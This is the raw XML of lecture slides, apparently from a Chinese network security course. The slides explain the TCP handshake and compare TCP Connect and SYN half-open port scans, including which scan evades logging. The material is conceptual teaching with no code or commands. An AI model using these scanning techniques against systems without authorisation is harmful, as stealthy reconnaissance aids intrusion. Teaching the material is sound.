        <p:nvGrpSpPr>
          <p:cNvPr id="382981" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2848619" y="3710136"/>
            <a:ext cx="3836988" cy="911225"/>
            <a:chOff x="1488" y="1776"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382982" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1488" y="1776"/>
              <a:ext cx="2496" cy="528"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 118182"/>
              </a:avLst>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382983" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1824" y="1920"/>
              <a:ext cx="1906" cy="195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN （</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>我可以连接吗？）</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="382984" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2772419" y="4472136"/>
            <a:ext cx="3836988" cy="911225"/>
            <a:chOff x="1440" y="2496"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382985" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1440" y="2496"/>
              <a:ext cx="2496" cy="528"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 118182"/>
              </a:avLst>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382986" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1613" y="2670"/>
              <a:ext cx="2006" cy="196"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ACK （</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>可以）/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>请确认！）</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="382987" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2926407" y="5332561"/>
            <a:ext cx="3836987" cy="911225"/>
            <a:chOff x="1536" y="3264"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382988" name="AutoShape 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1536" y="3264"/>
              <a:ext cx="2496" cy="528"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 118182"/>
              </a:avLst>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382989" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1790" y="3408"/>
              <a:ext cx="1906" cy="195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ACK （</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>确认连接）</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382990" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711844" y="5913586"/>
            <a:ext cx="1181100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>发起方</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="382991" name="Picture 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6763394" y="3786336"/>
            <a:ext cx="1681163" cy="2127250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382992" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7279332" y="5996136"/>
            <a:ext cx="1181100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>应答方</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="382993" name="Picture 17" descr="j0301260"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="710257" y="3840311"/>
            <a:ext cx="2046287" cy="1647825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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smtClean="0"/>
              <a:t>优点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>稳定可靠，不需要特殊的权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不隐蔽：会被日志记录（成功与否），容易被发现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>开放扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP Connect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2A55A8B9-EEF9-475A-A186-93EB886385B9}"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EF73C968-8484-4D41-A001-77F4C38F0D14}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331778" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全攻击方式（从信息流动的角度）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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266604"/>
            <a:ext cx="7129785" cy="559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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>连接的第一次握手</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>优点：隐蔽性较好，一般系统很少记录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缺点：需超级用户或者授权用户访问专门系统调用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>半开放扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP SYN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09AAC0CD-5DB7-470D-ADF2-FF7035842D14}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1602695" y="3501008"/>
            <a:ext cx="5964198" cy="2805113"/>
            <a:chOff x="1602695" y="3720231"/>
            <a:chExt cx="5964198" cy="2805113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6951340" y="3872631"/>
              <a:ext cx="615553" cy="2438400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0066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b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="华文行楷" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>被扫描主机</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文行楷" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5528543" y="394883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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>开放的端口</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4766543" y="49394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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>不提供服务的端口</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4690343" y="58538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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>防火墙过滤的端口</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1602695" y="3872631"/>
              <a:ext cx="553998" cy="2438400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0066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b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="华文行楷" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>扫描器</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文行楷" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2175743" y="4025031"/>
              <a:ext cx="3352800" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="99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Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2251943" y="5015631"/>
              <a:ext cx="2438400" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="99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 name="Line 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2251943" y="6006231"/>
              <a:ext cx="2438400" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="99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 name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2785343" y="37202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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2785343" y="46346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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2785343" y="57014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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2251943" y="4177431"/>
              <a:ext cx="3200400" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="66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Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2175743" y="5168031"/>
              <a:ext cx="2514600" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="66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0" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2251943" y="6158631"/>
              <a:ext cx="2438400" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="66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1" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3623543" y="417743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anose="02020603050405020304" pitchFamily="18" charset="0"/>
